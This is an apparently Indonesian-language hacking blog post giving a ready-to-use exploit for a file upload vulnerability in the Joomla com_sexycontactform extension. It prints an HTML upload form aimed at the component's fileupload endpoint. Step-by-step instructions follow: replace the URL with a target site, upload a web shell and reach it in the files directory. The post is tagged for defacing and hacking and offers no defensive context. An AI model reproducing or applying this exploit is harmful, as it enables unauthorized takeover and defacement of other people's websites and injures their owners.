Joomla com_sexycontactform File Upload Vulnerability

Exploit :

<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


Dork : Use your Brain

1.Misal udah dapet target, langsung masukin ke exploit itu ( http://localhost ) ganti dengan URL web target mu lalu simpan

http://s20.postimg.org/wqff9xge4/image.jpg


2.Setelah itu buka exploit tadi, ada form upload, browse shell mu, lalu klik upload
 http://s20.postimg.org/kna3md5bw/image.jpg


3.File access /components/com_sexycontactform//fileupload/files/namafilekamu
 http://s20.postimg.org/el2gvvgvw/image.jpg
 
Tag : Defacing, Hacking
0 Komentar untuk "Joomla com_sexycontactform File Upload Vulnerability"

Post a Comment

Back To Top